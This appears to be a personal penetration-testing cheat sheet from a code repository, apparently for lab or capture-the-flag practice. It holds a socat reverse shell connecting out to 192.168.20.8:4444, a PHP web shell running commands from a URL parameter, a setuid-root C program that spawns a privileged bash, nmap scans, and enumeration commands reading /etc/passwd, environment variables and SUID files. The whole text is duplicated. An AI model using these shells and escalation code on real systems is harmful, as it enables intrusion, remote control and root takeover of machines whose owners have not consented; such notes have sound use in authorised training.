Cuncis/NEW-NOTES-PENTEST

## NEW-NOTES-PENTEST
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat exec:'bash' -li',pty,stderr,setsid,sigint,sane tcp:192.168.20.8:4444

nmap -p- --min-rate 10000 10.10.10.48
nmap -p 22,53,80,1877,32400,32469 -sCV 10.10.10.48

```````
cat file | xclip -selection clipboard

```````
# PrivEsc C CODE #
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
int main(void){
	setuid(0);
	setgid(0);
	system("/bin/bash -p");
	return(0);
}


<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>

# Find vuln to escalate root access #
hostname
uname -a
lsb_release -a
cat /proc/version
cat /etc/issue
cat /etc/passwd
ps A , ps axjf , ps aux
env
sudo -l
id

Find files:
find / -type f -perm -4000 2>/dev/null
find . -name flag1.txt: find the file named “flag1.txt” in the current directory
find /home -name flag1.txt: find the file names “flag1.txt” in the /home directory
find / -type d -name config: find the directory named config under “/”
find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and executable by all users)
find / -perm a=x: find executable files
find /home -user frank: find all files for user “frank” under “/home”
find / -mtime 10: find files that were modified in the last 10 days
find / -atime 10: find files that were accessed in the last 10 day
find / -cmin -60: find files changed within the last hour (60 minutes)
find / -amin -60: find files accesses within the last hour (60 minutes)
find / -size 50M: find files with a 50 MB size
	socat file:`tty`,raw,echo=0 tcp-listen:4444
	socat exec:'bash' -li',pty,stderr,setsid,sigint,sane tcp:192.168.20.8:4444

	nmap -p- --min-rate 10000 10.10.10.48
	nmap -p 22,53,80,1877,32400,32469 -sCV 10.10.10.48

	```````
	cat file \| xclip -selection clipboard

	```````
	# PrivEsc C CODE #
	#include<stdio.h>
	#include<stdlib.h>
	#include<unistd.h>
	int main(void){
	setuid(0);
	setgid(0);
	system("/bin/bash -p");
	return(0);
	}


	<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>

	# Find vuln to escalate root access #
	hostname
	uname -a
	lsb_release -a
	cat /proc/version
	cat /etc/issue
	cat /etc/passwd
	ps A , ps axjf , ps aux
	env
	sudo -l
	id

	Find files:
	find / -type f -perm -4000 2>/dev/null
	find . -name flag1.txt: find the file named “flag1.txt” in the current directory
	find /home -name flag1.txt: find the file names “flag1.txt” in the /home directory
	find / -type d -name config: find the directory named config under “/”
	find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and executable by all users)
	find / -perm a=x: find executable files
	find /home -user frank: find all files for user “frank” under “/home”
	find / -mtime 10: find files that were modified in the last 10 days
	find / -atime 10: find files that were accessed in the last 10 day
	find / -cmin -60: find files changed within the last hour (60 minutes)
	find / -amin -60: find files accesses within the last hour (60 minutes)
	find / -size 50M: find files with a 50 MB size